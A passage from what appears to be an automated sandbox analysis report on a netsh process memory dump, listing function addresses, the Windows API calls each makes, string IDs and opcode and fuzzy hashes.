              • Instruction Fuzzy Hash: 0A513432620207AFDB21AF7CDC8996EBBADFB452A4F044629E9019B150E7708C54DBD0
              Function 01563A08 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 125memoryCOMMON
              Download Yara Rule
              APIs
              • _wcsicmp.MSVCRT ref: 01563A59
              • _wcsicmp.MSVCRT ref: 01563A6F
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01563A95
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563A9C
              • memcpy.MSVCRT ref: 01563ABB
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01563AD6
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563ADD
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 01563B07
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563B0E
              • _wcsupr.MSVCRT ref: 01563B31
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563B46
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563B4D
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Alloc$_wcsicmp$Free_wcsuprmemcpy
              • String ID: ipxmontr.dll$ipxpromn.dll
              • API String ID: 1906506965-3013806906
              • Opcode ID: cf4bf378662fae3802108ff10add92b43d2d339df01b0845f4c81e9891e98836
              • Instruction ID: 190e8c0a1f38bdb29c150933723976601d391340bb91a9d98ddc684c113f700a
              • Opcode Fuzzy Hash: cf4bf378662fae3802108ff10add92b43d2d339df01b0845f4c81e9891e98836
              • Instruction Fuzzy Hash: 01412E71A002029BDB259F7CF84E9AABBBCFB44325711042EE95ADF145DB30E509DBA0
              Function 01567450 Relevance: 24.2, APIs: 16, Instructions: 189memorywindowCOMMON
              Download Yara Rule
              APIs
              • wcspbrk.MSVCRT ref: 01567481
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?), ref: 01567634
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156763B
              • PrintMessageFromModule.NETSH(00003AA0,?), ref: 01567650
              • PrintMessageFromModule.NETSH(00000068), ref: 01567673
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: FromHeapMessageModulePrint$FreeProcesswcspbrk
              • String ID:
              • API String ID: 3977950575-0
              • Opcode ID: f7bbba05a0e575d12d984709499f479bec565f199042cc7563c388fd1a5ce501
              • Instruction ID: 710f7836898c036eda4ed7fdda15d55a0cf4c277f3c1f4ea018eea7c79057ba6
              • Opcode Fuzzy Hash: f7bbba05a0e575d12d984709499f479bec565f199042cc7563c388fd1a5ce501
              • Instruction Fuzzy Hash: 5F71B271D00216DFDF21CFA8D8899AEBBB9FB48328F054565E826AB251D7349D44CFD0
              Function 015677C6 Relevance: 24.1, APIs: 16, Instructions: 110memoryfileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 01569CA9: __iob_func.MSVCRT ref: 01569CAE
              • fflush.MSVCRT ref: 015677ED
              • fgets.MSVCRT ref: 01567800
              • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,000000FF,00000000,00000000,00000000,?,?,?,?,?), ref: 01567820
              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,?,?,?,?), ref: 01567827
              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000002,?,00000000,?,?,?,?,?), ref: 0156786B
              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,?), ref: 0156787B
              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?), ref: 01567887
              • PrintError.NETSH(00000000,00000000,?,?,?,?,?), ref: 0156788F
                • Part of subcall function 01567BC0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567C05
                • Part of subcall function 01567BC0: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000500,?,00000000,00000000,?,00000000,?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567C2C
                • Part of subcall function 01567BC0: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567C3A
                • Part of subcall function 01567BC0: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567C53
              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00000002,?,00000000,?,?,?,?,?), ref: 015678AD
              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,?), ref: 015678BD
              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?), ref: 015678C9
              • PrintError.NETSH(00000000,00000000,?,?,?,?,?), ref: 015678D1
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,?,?,?), ref: 015678DD
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?), ref: 015678E4
              • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,00002000,00000000,00000000,?,?,?,?,?), ref: 01567900
              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,?,?,?,?), ref: 01567907
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Error$Handle$ByteCharCloseConsoleFileHeapLastMultiOutputPrintWideWrite$AllocFormatFreeLoadLocalMessageProcessString__iob_funcfflushfgets
              • String ID:
              • API String ID: 3788396652-0
              • Opcode ID: f1246c9645d48bfcacaf5b1e95f22b0603fe1a5b820bde0b220cb040fa6f0022
              • Instruction ID: 58c090884c6ade678e6fd445c8ec81ea5e088511d33b599ea7b06bcf3ea189a9
              • Opcode Fuzzy Hash: f1246c9645d48bfcacaf5b1e95f22b0603fe1a5b820bde0b220cb040fa6f0022
              • Instruction Fuzzy Hash: 31319175610205AFE7319B65FC8DEAA7BBCFB88725F010059FA15CB145EA308908EBB1
              Function 01566A15 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 158memorywindowCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?), ref: 01566A4C
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01566A53
                • Part of subcall function 015653D8: _wcslwr.MSVCRT ref: 015653EE
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?), ref: 01566A85
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01566A8C
              • GetComputerNameExW.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000001,?,?), ref: 01566AFE
              • PrintMessageFromModule.NETSH(000000B4,?,?,00000000,?), ref: 01566B14
              • PrintError.NETSH(00000000,00000000,?,00000000,?), ref: 01566B20
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000208,?,?,00000000,?), ref: 01566B9C
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?), ref: 01566BA3
              • PrintMessageFromModule.NETSH(00000000,0000000E,?,?,00000000,?), ref: 01566BB5
                • Part of subcall function 01568D48: CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000006,?,?,?), ref: 01568D7D
                • Part of subcall function 01568D48: CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(01561C9C,00000000,00000001,01561CAC,?), ref: 01568DAA
                • Part of subcall function 01568D48: SysAllocString.OLEAUT32(?), ref: 01568DED
                • Part of subcall function 01568D48: SysAllocString.OLEAUT32(?), ref: 01568E37
                • Part of subcall function 01568D48: SysAllocString.OLEAUT32(?), ref: 01568E4B
                • Part of subcall function 01568D48: SysAllocString.OLEAUT32(00000000), ref: 01568E54
                • Part of subcall function 01568D48: SysFreeString.OLEAUT32(00000000), ref: 01568E92
                • Part of subcall function 01568D48: SysFreeString.OLEAUT32(00000000), ref: 01568E99
                • Part of subcall function 01568D48: SysFreeString.OLEAUT32(?), ref: 01568EA3
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: String$AllocHeap$Free$PrintProcess$FromMessageModule$ComputerCreateErrorInitializeInstanceName_wcslwr
              • String ID: \\%s\ipc$$netsh
              • API String ID: 876722747-2229480662
              • Opcode ID: d644b8c402a2a3bc8c805b379b41338f44700d001e8fa02404ef923f5fca221f
              • Instruction ID: 4ac08240784d6190651d67d402aee2b7ad109c219c8e68d75cdea9fd339ed224
              • Opcode Fuzzy Hash: d644b8c402a2a3bc8c805b379b41338f44700d001e8fa02404ef923f5fca221f
              • Instruction Fuzzy Hash: 8F51BDB1614312ABD725EF29E88596FB7ECFB84724F00891EB955CF240EB70D9448BE1
              Function 01563B75 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 132registrywindowCOMMON
              Download Yara Rule
              APIs
              • _wcsicmp.MSVCRT ref: 01563BA6
              • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,SOFTWARE\Microsoft\NetSh,00000000,STRING,00000000,000F003F,00000000,?,00000000), ref: 01563BE3
              • _wcsdup.MSVCRT ref: 01563BF4
              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 01563C07
              • wcsrchr.MSVCRT ref: 01563C1A
              • wcsrchr.MSVCRT ref: 01563C29
              • wcsrchr.MSVCRT ref: 01563C50
              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,00000000,00000001,00000000,00000000), ref: 01563C90
              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 01563C9E
              • free.MSVCRT(00000000), ref: 01563CA5
              • PrintMessageFromModule.NETSH(000003E8), ref: 01563CD4
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: wcsrchr$Close$CreateFromMessageModulePrintValue_wcsdup_wcsicmpfree
              • String ID: SOFTWARE\Microsoft\NetSh$STRING
              • API String ID: 3059030296-2051982046
              • Opcode ID: ff5bbc6fe9c3b25f4dab57dd985e848a7af2aacef83dd31f0c27e6e7897184c7
              • Instruction ID: b6f72ac2eda50c44902269d0949c0a21c0d4bcace193391ee9b1fc7b5ee5f0b3
              • Opcode Fuzzy Hash: ff5bbc6fe9c3b25f4dab57dd985e848a7af2aacef83dd31f0c27e6e7897184c7
              • Instruction Fuzzy Hash: 7E41E436600215AFEB255B29FC4AAAE776DFF85225F11006DF50A9F184EE709D08DBA0
              Function 01562095 Relevance: 22.7, APIs: 15, Instructions: 164memorywindowCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000010), ref: 01562141
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562148
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 0156215D
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562164
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01562172
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562179
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01562185
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156218C
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01562199
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015621A0
              • PrintMessageFromModule.NETSH(00000068), ref: 015621B5
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 015621D9
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015621E0
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 015621F2
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015621F9
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Alloc$Free$FromMessageModulePrint
              • String ID:
              • API String ID: 794174124-0
              • Opcode ID: 3f230b178dfbc962b854d9b3a0241789467271882758cda383c38992b1dd685e
              • Instruction ID: dfc94f2a7b0c8ca8a3e81b854788e72a4cf261709ffb35bd34d4f5d0ec735afe
              • Opcode Fuzzy Hash: 3f230b178dfbc962b854d9b3a0241789467271882758cda383c38992b1dd685e
              • Instruction Fuzzy Hash: AF51F7B5A10212EBDB219F78E84986AB7FDFF44324B014819E95ADF244EB31D945CBA0
              Function 015645E0 Relevance: 19.7, APIs: 13, Instructions: 231windowCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: wcschr$FromMessageModulePrint$_wcsicmpmemcpy
              • String ID:
              • API String ID: 1297359847-0
              • Opcode ID: f24a7f3edc59bc96bf9b3cf954f61f7537c4c4faf9a274c90dfe00e06372fea5
              • Instruction ID: bc5d0294b37ffe89d7fe8d8661a1301a19f2f16dccee9c039ca3ed4823f68705
              • Opcode Fuzzy Hash: f24a7f3edc59bc96bf9b3cf954f61f7537c4c4faf9a274c90dfe00e06372fea5
              • Instruction Fuzzy Hash: 33810335A00202DFDF29DF68E8C1AAEBBB9FF44710B14406DD9119F684EB30A951CBD0
              Function 0156562B Relevance: 19.7, APIs: 13, Instructions: 196memoryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0156401D: MatchToken.NETSH(?,?,00000000,00000000,?,?,?,0156566F,?,?,00000000,?), ref: 01564041
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,00000000,?), ref: 01565705
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156570C
              • GenericMonitor.NETSH(?,00000004,?,?,00000000,0156F3D8,?,?,?,00000000,?), ref: 01565741
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00000000,?), ref: 01565792
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01565799
              • memcpy.MSVCRT ref: 015657B3
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000004), ref: 015657C1
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015657C8
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,015612B0), ref: 01565808
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156580F
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01565818
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156581F
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Free$Alloc$GenericMatchMonitorTokenmemcpy
              • String ID:
              • API String ID: 3287015945-0
              • Opcode ID: a00c3f8b6dffdde6d361609284f205994d73c9c6b805688acd6ac80e5ac1f840
              • Instruction ID: c803b7f3f3764fc7c42827308a639c9ab5a353a438b509e0b9d4f5995c24c43a
              • Opcode Fuzzy Hash: a00c3f8b6dffdde6d361609284f205994d73c9c6b805688acd6ac80e5ac1f840
              • Instruction Fuzzy Hash: A961C471664303ABD7219F68D849B6E77EDFB943A4F104828F9198F251EB30D848CBE1
              Function 015653F7 Relevance: 19.7, APIs: 13, Instructions: 188memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,?,?,?,?), ref: 015654B6
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015654BD
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?), ref: 01565547
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156554E
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$AllocFree
              • String ID:
              • API String ID: 756756679-0
              • Opcode ID: 905f2939b3accd0e99323641275b6efce868b822783e5d62341340b3f5a9caa0
              • Instruction ID: 71591221ff06a256583bca63cc644c04dfecf0c2da9b1c5de76daa55f4e32f60
              • Opcode Fuzzy Hash: 905f2939b3accd0e99323641275b6efce868b822783e5d62341340b3f5a9caa0
              • Instruction Fuzzy Hash: 5751C5717A0302ABDB219F68EC49B6A7BADFB947A5F004425F959CF244E730C944CBE1
              Function 0156846A Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 377windowmemoryCOMMON
              Download Yara Rule
              APIs
              • PrintMessageFromModule.NETSH(00000087,00000000,?,?,?,01564CB5,?,00000002,?,?,?,?), ref: 0156850E
              • _wcsicmp.MSVCRT ref: 015685E2
              • PrintMessageFromModule.NETSH(?,00000070,?,00000000,?,?,?,01564CB5,?,00000002,?,?,?), ref: 0156881E
              • PrintMessageFromModule.NETSH(?,0000006F,00000000,?,?,?,01564CB5,?,00000002,?,?,?), ref: 0156882B
              • PrintMessageFromModule.NETSH(?,00000069,00000000,?,?,?,01564CB5,?,00000002,?,?,?), ref: 0156885D
              • PrintMessage.NETSH( %1!s!,?,00000000,?,?,?,01564CB5,?,00000002,?,?,?), ref: 01568888
              • PrintMessage.NETSH(01561320,00000000,?,?,?,01564CB5,?,00000002,?,?,?), ref: 0156889E
              • PrintMessageFromModule.NETSH(?,0000006B,015612B0,00000000,?,?,?,01564CB5,?,00000002,?,?,?), ref: 015688B2
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,?,01564CB5,?,00000002,?,?,?), ref: 015688C7
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564CB5,?,00000002,?,?,?), ref: 015688CE
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: MessagePrint$FromModule$Heap$FreeProcess_wcsicmp
              • String ID: %1!s!
              • API String ID: 1398923986-2251066777
              • Opcode ID: ae6699099e2a031a3b6a6a811dadf81f27d039fa255d897fb5552c3709050f62
              • Instruction ID: 02248122413525ead15503843cdbcc4d737e5046d58c880146f07ddf3e4810da
              • Opcode Fuzzy Hash: ae6699099e2a031a3b6a6a811dadf81f27d039fa255d897fb5552c3709050f62
              • Instruction Fuzzy Hash: 2AE19E70A003029FDB28CF68D881A6EB7BAFF98314B148568D9159F296DB71ED50CBD0
              Function 01567920 Relevance: 19.6, APIs: 13, Instructions: 80memoryfileCOMMON
              Download Yara Rule
              APIs
              • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,000000B6,000000FF,00000000,00000000,00000000,00000000,0156471D,00000000,00004000,00000000,00000000,?,01567E48,?,01567F23), ref: 01567939
              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567940
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 0156794A
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567951
              • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,000000B6,000000FF,00000000,00000000,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567969
              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567970
              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(000000B6,00000000,-00000001,0156471D,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567981
              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,-00000001,0156471D,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567998
              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679A8
              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679B4
              • PrintError.NETSH(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679BC
                • Part of subcall function 01567BC0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567C05
                • Part of subcall function 01567BC0: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000500,?,00000000,00000000,?,00000000,?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567C2C
                • Part of subcall function 01567BC0: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567C3A
                • Part of subcall function 01567BC0: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567C53
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679C5
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679CC
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$ByteCharConsoleErrorFileFreeHandleMultiOutputProcessWideWrite$AllocCloseFormatLastLoadLocalMessagePrintString
              • String ID:
              • API String ID: 3846968651-0
              • Opcode ID: c8c48798eb728b5b6b474af3cfa30dced5fe7a6b1c56db2391dda443de8ad497
              • Instruction ID: 849094b999039d7ae4a64b0f51f13919f77c119c1bc7fcbb8326690e91122ce4
              • Opcode Fuzzy Hash: c8c48798eb728b5b6b474af3cfa30dced5fe7a6b1c56db2391dda443de8ad497
              • Instruction Fuzzy Hash: A21193B1511220BFDB316BB6FC4ED9B7F6CEB853797110118B626DA144EA309908EBB0
              Function 0156831B Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 114memorywindowCOMMON
              Download Yara Rule
              APIs
              • qsort.MSVCRT ref: 01568336
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000001,?,?,?,?,?,01564CB5,?,00000002,?,?,?), ref: 015683A2
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,01564CB5,?,00000002,?,?,?), ref: 015683A9
              • PrintMessage.NETSH(%1!-14s! - ,01573FEC,?,?,?,?,?,01564CB5,?,00000002,?,?,?), ref: 015683BC
              • PrintMessage.NETSH(%1!-14s! - ,00000000,01573FEC,0156131C,?,?,?,?,?,?,01564CB5,?,00000002,?,?,?), ref: 015683F1
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,01573FEC,0156131C,?,?,?,?,?,?,01564CB5,?,00000002,?,?,?), ref: 015683FC
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,01564CB5,?,00000002,?,?,?), ref: 01568403
              • PrintMessage.NETSH(%1!-14s! - ,01573FEC,00000001,?,?,?,?,?,01564CB5,?,00000002,?,?,?), ref: 01568412
              • PrintMessageFromModule.NETSH(?,?,?,?,0156131C,00000001,?,?,?,?,?,01564CB5,?,00000002,?,?), ref: 01568436
              • PrintMessage.NETSH(01561320,?,?,?,?,00000001,?,?,?,?,?,01564CB5,?,00000002,?,?), ref: 01568447
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: MessagePrint$Heap$Process$AllocFreeFromModuleqsort
              • String ID: %1!-14s! -
              • API String ID: 3292501186-4170063814
              • Opcode ID: 6b6de4a4faa89b83bc0b2e6e291649565d8ce45c1c4dd6c24b2b9108105bf486
              • Instruction ID: 635442ad4abc6d3ce3b8efca7bc71284499a6fd9f828659925981a67c335ddc7
